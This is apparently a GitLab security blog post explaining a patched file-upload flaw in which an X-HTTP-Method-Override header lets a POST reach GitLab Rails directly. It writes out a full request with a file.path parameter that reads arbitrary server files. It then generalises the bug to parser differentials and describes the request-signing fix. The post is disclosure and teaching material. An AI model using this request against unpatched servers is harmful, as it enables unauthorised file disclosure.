March 30, 2020

How to exploit parser differentials

Your guide to abusing 'language barriers' between web components.


The move to microservices-based architecture creates more attack surface for nefarious actors, so when our security researchers discovered a file upload vulnerability within GitLab, we patched it right up in our GitLab 12.7.4 security release. In this post we dive deeper into the problems that led to this vulnerability and use it to illustrate the underlying concept of parser differentials.

File Uploads in GitLab

To understand the file upload vulnerability we need to go a bit deeper into file uploads within GitLab, and have a look at the involved components.

GitLab Workhorse

The first relevant component is GitLab's very own reverse proxy, gitlab-workhorse. gitlab-workhorse fulfills a variety of tasks, but for this specific example we only care about certain kinds of file uploads.

The second component is gitlab-rails, the Ruby on Rails-based heart of GitLab. It's the main application part of GitLab and implements most of the business logic.

The following source code excerpts from gitlab-workhorse are based on the 8.18.0 release which was the most recent version at the time of identifying the vulnerability.

Consider the following route, defined in internal/upstream/routes.go, which handles file uploads for Conan packages:

// Conan Artifact Repository
route("PUT", apiPattern+`v4/packages/conan/`, filestore.BodyUploader(api, proxy, nil)),

The route defined above passes any PUT request for paths underneath /api/v4/packages/conan/ to the BodyUploader. Within this BodyUploader some magic happens. Well, actually, it's not magic: the BodyUploader receives the uploaded file and lets the gitlab-rails backend know where the file has been placed.

Also worth mentioning: gitlab-workhorse passes any request that matches none of its routes on to the backend without modification. That's especially important in our discussion for non-PUT requests to paths under /api/v4/packages/conan/.

Telling the backend where the file has been placed happens in internal/filestore/file_handler.go:

// GitLabFinalizeFields returns a map with all the fields GitLab Rails needs in order to finalize the upload.
func (fh *FileHandler) GitLabFinalizeFields(prefix string) map[string]string {
	data := make(map[string]string)
	key := func(field string) string {
		if prefix == "" {
			return field
		}

		return fmt.Sprintf("%s.%s", prefix, field)
	}
  
	if fh.Name != "" {
		data[key("name")] = fh.Name
	}
	if fh.LocalPath != "" {
		data[key("path")] = fh.LocalPath
	}
	if fh.RemoteURL != "" {
		data[key("remote_url")] = fh.RemoteURL
	}
	if fh.RemoteID != "" {
		data[key("remote_id")] = fh.RemoteID
	}
	data[key("size")] = strconv.FormatInt(fh.Size, 10)
	for hashName, hash := range fh.hashes {
		data[key(hashName)] = hash
	}
  
	return data
}

So gitlab-workhorse replaces the uploaded file in the request with the path to where it has stored the file on disk, so that the gitlab-rails backend knows where to pick it up.
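To connect the Go helper above to the parameters gitlab-rails receives, here is a small Ruby model of the same key-prefixing logic. It is only a sketch: the method name finalize_fields and its keyword arguments are made up for illustration, and the values are taken from the example request in this post.

```ruby
# Illustrative Ruby model of the key-prefixing done by GitLabFinalizeFields.
# The method name and keyword arguments are hypothetical, not GitLab code.
def finalize_fields(prefix, name: "", local_path: "", remote_url: "", remote_id: "", size: 0, hashes: {})
  # Prefix every field name with "<prefix>." unless the prefix is empty.
  key = ->(field) { prefix.empty? ? field : "#{prefix}.#{field}" }

  data = {}
  data[key.call("name")] = name unless name.empty?
  data[key.call("path")] = local_path unless local_path.empty?
  data[key.call("remote_url")] = remote_url unless remote_url.empty?
  data[key.call("remote_id")] = remote_id unless remote_id.empty?
  data[key.call("size")] = size.to_s
  hashes.each { |hash_name, digest| data[key.call(hash_name)] = digest }
  data
end

fields = finalize_fields(
  "file",
  local_path: "/var/opt/gitlab/gitlab-rails/shared/packages/tmp/uploads/582573467",
  size: 1765,
  hashes: { "sha1" => "93ebaf6e85e8edde99c1ed46eaa1b5e1e5f4ac78" }
)
puts fields
```

With the prefix "file", the resulting keys are file.path, file.size and file.sha1, which is the shape of the parameters that reach the backend.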

Observe the following original request, as received by gitlab-workhorse:

PUT /api/v4/packages/conan/v1/files/Hello/0.1/root+xxxxx/beta/0/export/conanfile.py HTTP/1.1
Host: localhost
User-Agent: Conan/1.22.0 (Python 3.8.1) python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-Checksum-Sha1: 93ebaf6e85e8edde99c1ed46eaa1b5e1e5f4ac78
Content-Length: 1765
Authorization: Bearer [.. shortened ..]

from conans import ConanFile, CMake, tools


class HelloConan(ConanFile):
    name = "Hello"
[.. shortened ..]

This is what this request will look like to gitlab-rails after gitlab-workhorse has processed it (excerpted from api_json.log):

{
  "time": "2020-02-20T14:49:44.738Z",
  "severity": "INFO",
  "duration": 201.93,
  "db": 67.34,
  "view": 134.59,
  "status": 200,
  "method": "PUT",
  "path": "/api/v4/packages/conan/v1/files/Hello/0.1/root+xxxxx/beta/0/export/conanfile.py",
  "params": [
    {
      "key": "file.md5",
      "value": "719f0319f1fd5f6fcbc2433cc0008817"
    },
    {
      "key": "file.path",
      "value": "/var/opt/gitlab/gitlab-rails/shared/packages/tmp/uploads/582573467"
    },
    {
      "key": "file.sha1",
      "value": "93ebaf6e85e8edde99c1ed46eaa1b5e1e5f4ac78"
    },
    {
      "key": "file.sha256",
      "value": "f7059b223cd4d32002e5e34ab1ae5b4ea12f3bd0326589b00d5e910ce02c1f3a"
    },
    {
      "key": "file.sha512",
      "value": "efbe75ea58bd817d42fd9ca5ac556abd6fbe3236f66dfad81d508b5860252d32d1b1868ee03c7f4c6174a0ba6cc920a574b5865ca509f36c451113c9108f9a36"
    },
    {
      "key": "file.size",
      "value": "1765"
    }
  ],
  "host": "localhost",
  "remote_ip": "172.17.0.1, 127.0.0.1",
  "ua": "Conan/1.22.0 (Python 3.8.1) python-requests/2.22.0",
  "route": "/api/:version/packages/conan/v1/files/:package_name/:package_version/:package_username/:package_channel/:recipe_revision/export/:file_name",
  "user_id": 1,
  "username": "root",
  "queue_duration": 16.59,
  "correlation_id": "aSEqrgEfvX9"
}

In particular, the params entry file.path is of interest, as it denotes the file system path where gitlab-workhorse has placed the uploaded file.

gitlab-rails

This gitlab-workhorse-modified request, as gitlab-rails will see it, is handled in lib/uploaded_file.rb within the from_params method:

01  def self.from_params(params, field, upload_paths)
02    path = params["#{field}.path"]
03    remote_id = params["#{field}.remote_id"]
04    return if path.blank? && remote_id.blank?
05
06    file_path = nil
07    if path
08      file_path = File.realpath(path)
09
10      paths = Array(upload_paths) << Dir.tmpdir
11      unless self.allowed_path?(file_path, paths.compact)
12        raise InvalidPathError, "insecure path used '#{file_path}'"
13      end
14    end
15
16    UploadedFile.new(file_path,
17      filename: params["#{field}.name"],
18      content_type: params["#{field}.type"] || 'application/octet-stream',
19      sha256: params["#{field}.sha256"],
20      remote_id: remote_id,
21      size: params["#{field}.size"])
22  end

We can see here how the uploaded file reference is handled. Lines 10-13 in the snippet above implement a whitelist of paths from which a file uploaded via gitlab-workhorse will be accepted. Dir.tmpdir, which resolves to the path /tmp, is added to the whitelist as well. The subsequent lines construct a new UploadedFile from file.path and the other parameters gitlab-workhorse has set.
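The body of allowed_path? is not shown in this post. As a rough illustration of what such a whitelist check can look like, here is a minimal sketch that resolves symlinks first and then compares directory prefixes. The helper name path_allowed? and the file names are hypothetical, and this is an assumption about the general technique, not GitLab's implementation.

```ruby
require "tmpdir"

# Hypothetical stand-in for a path whitelist check; not GitLab's allowed_path?.
# Both the candidate and the allowed directories are resolved with File.realpath,
# so symlinks pointing outside the allowed directories are rejected.
def path_allowed?(candidate, allowed_dirs)
  real = File.realpath(candidate)
  allowed_dirs.any? do |dir|
    root = File.realpath(dir)
    real == root || real.start_with?(root + File::SEPARATOR)
  end
end

Dir.mktmpdir do |uploads|
  Dir.mktmpdir do |outside|
    upload = File.join(uploads, "582573467")
    secret = File.join(outside, "secret.txt")
    link = File.join(uploads, "link")
    File.write(upload, "data")
    File.write(secret, "secret")
    File.symlink(secret, link)

    puts path_allowed?(upload, [uploads]) # regular file inside the allowed directory
    puts path_allowed?(secret, [uploads]) # file outside the allowed directory
    puts path_allowed?(link, [uploads])   # symlink inside, target outside
  end
end
```

Note that a check like this only constrains where the file lives. It says nothing about who supplied the path, which is the gap the next section exploits.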

gitlab-workhorse bypass

So we've seen the inner workings of both gitlab-workhorse and gitlab-rails when it comes to file uploads for Conan packages. To recap, the flow is as follows:

sequenceDiagram
    participant User
    participant workhorse
    participant Rails
    User->>workhorse: PUT request to conan registry
    workhorse->>workhorse: Place uploaded file on disk and re-write PUT request
    workhorse->>Rails: Pass on modified PUT request
    Rails->>Rails: Pick up file from disk and store in UploadedFile

From an attacker's perspective it would be nice to meddle with the modified PUT request. In particular, control over the file.path parameter would allow us to grab arbitrary files from /tmp and the defined upload_paths. But as gitlab-workhorse sits right in front of gitlab-rails, we can't simply pass those parameters ourselves or otherwise interact with gitlab-rails without going through gitlab-workhorse.

We can nevertheless achieve this by leveraging the fact that gitlab-workhorse parses HTTP requests differently than gitlab-rails does. In particular, we can use Rack::MethodOverride in gitlab-rails, which is a default middleware in Ruby on Rails applications. The Rack::MethodOverride middleware allows us to send a POST request and let gitlab-rails know "well, actually this is a PUT request! ¯\_(ツ)_/¯ ". With this little trick we can sneak past the gitlab-workhorse route that would intercept the PUT request, as gitlab-workhorse is not aware that the POST method has been overridden. So by specifying either a _method=PUT parameter or an X-HTTP-METHOD-OVERRIDE: PUT HTTP header we can point gitlab-rails directly to files on disk. The method override is used a lot in Ruby on Rails applications to allow simple <form>-based POST requests to use other REST methods like PUT and DELETE by overriding the <form>'s POST request with the _method parameter.

So a POST request to the right Conan endpoint with file.path and file.size parameters will do the trick. A full request using this bypass would look like this:

POST /api/v4/packages/conan/v1/files/Hello/0.1/lol+wat/beta/0/export/conanmanifest.txt?file.size=4&file.path=/tmp/test1234 HTTP/1.1
Host: localhost
User-Agent: Conan/1.21.0 (Python 3.8.1) python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-HTTP-Method-Override: PUT
X-Checksum-Deploy: true
X-Checksum-Sha1: ee96149f7b93af931d4548e9562484bdb6ac8fda
Content-Length: 4
Authorization: Bearer [.. shortened ..]

asdf

Instead of uploading a file, this request lets us get hold of the file /tmp/test1234 from the GitLab server's file system. To recap, the flow to exploit this issue looks as follows:

sequenceDiagram
    participant User
    participant workhorse
    participant Rails
    User->>workhorse: POST request to conan registry
    workhorse->>workhorse: Route does not match anything
    workhorse->>Rails: Pass on unmodified POST request
    Rails->>Rails: Interpret as PUT and pick up file from disk
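The flow above can be modeled in a few lines of Ruby. This is a deliberately simplified sketch and not actual gitlab-workhorse or Rack code: the function names proxy_intercepts?, backend_method and bypasses_proxy? are invented for illustration, and the override handling only approximates what the middleware does.

```ruby
# Simplified model of the two components; not actual gitlab-workhorse or Rack code.
CONAN_PREFIX = "/api/v4/packages/conan/"

# Proxy view: only a literal PUT below the Conan prefix is intercepted and rewritten.
def proxy_intercepts?(http_method, path)
  http_method == "PUT" && path.start_with?(CONAN_PREFIX)
end

# Backend view: a POST may be relabelled via the override header or the _method parameter.
def backend_method(http_method, headers = {}, params = {})
  return http_method unless http_method == "POST"

  normalized = headers.transform_keys { |name| name.to_s.downcase }
  override = normalized["x-http-method-override"] || params["_method"]
  override ? override.to_s.upcase : http_method
end

# True when the backend treats the request as a Conan PUT that the proxy never rewrote.
def bypasses_proxy?(http_method, path, headers = {}, params = {})
  path.start_with?(CONAN_PREFIX) &&
    backend_method(http_method, headers, params) == "PUT" &&
    !proxy_intercepts?(http_method, path)
end

path = "/api/v4/packages/conan/v1/files/Hello/0.1/lol+wat/beta/0/export/conanmanifest.txt"
puts bypasses_proxy?("PUT", path)                                         # regular upload
puts bypasses_proxy?("POST", path)                                        # plain POST
puts bypasses_proxy?("POST", path, { "X-HTTP-Method-Override" => "PUT" }) # overridden POST
```

Only the third request is seen differently by the two components: the proxy sees a POST it does not care about, while the backend sees a PUT and trusts the accompanying file.path parameter.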

We fixed this issue within gitlab-workhorse by signing requests that pass through gitlab-workhorse; the signature is then verified on the gitlab-rails side.
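The general idea of such a fix can be sketched as follows. This post does not describe the actual signature format, so everything here is an assumption for illustration: an HMAC-SHA256 over the rewritten upload fields with a secret shared between proxy and backend, and the hypothetical helper names sign_fields, secure_equal? and verified_fields.

```ruby
require "openssl"
require "json"

# Proxy side (hypothetical): sign the rewritten upload fields with a shared secret.
def sign_fields(fields, secret)
  payload = JSON.generate(fields.sort) # sort for a stable serialization
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new("SHA256"), secret, payload)
end

# Compare two strings without returning early on the first differing byte.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize

  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

# Backend side (hypothetical): accept the fields only if the signature matches.
def verified_fields(fields, signature, secret)
  expected = sign_fields(fields, secret)
  unless secure_equal?(expected, signature.to_s)
    raise ArgumentError, "upload fields were not signed by the proxy"
  end

  fields
end

secret = "shared-secret-for-illustration"
fields = { "file.path" => "/var/opt/gitlab/gitlab-rails/shared/packages/tmp/uploads/582573467", "file.size" => "1765" }
signature = sign_fields(fields, secret)
puts verified_fields(fields, signature, secret) == fields
```

With a check like this, a client that supplies its own file.path cannot produce a valid signature without the shared secret, so the backend no longer has to infer from the request alone whether the proxy rewrote it.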

How parser differentials can introduce vulnerabilities

Let's take a huge step back and see from a high-level perspective what just happened. Both gitlab-workhorse and gitlab-rails looked at the same POST request, but gitlab-rails ultimately saw a PUT request due to the overridden HTTP method.

What occurred here is a case of a parser differential, as gitlab-workhorse and gitlab-rails parsed the incoming HTTP request differently. The term parser differential originates from the Language-theoretic Security approach. It denotes the fact that two (or more) different parsers "understand" the very same message in different ways. Or, as the LangSec handout puts it:

Different interpretation of messages or data streams by components breaks any assumptions that components adhere to a shared specification and so introduces inconsistent state and unanticipated computation.

Indeed, such issues and the resulting unanticipated computation are becoming more and more common in modern web environments. The days of web applications being a stand-alone bunch of scripts invoked on a web server are long gone. The rise of microservices leads to complex environments, and the very same message (or HTTP request) might be interpreted by several different services in several different ways. Just as shown in the above example, this sometimes comes with security implications.

From the point of view of a pragmatic bug hunter, the idea of parser differentials is very interesting, as these issues can yield unique security bugs. Consider, for instance, this RCE in CouchDB. The HTTP desync attack technique, which has gotten a lot of attention in the bug bounty community, is also a matter of parser differentials.

From the developer's perspective, we need to be aware of other components and their parsing behavior in order to avoid security issues that arise from interpreting the same message differently.

Cover Photo by Marta Branco on Pexels
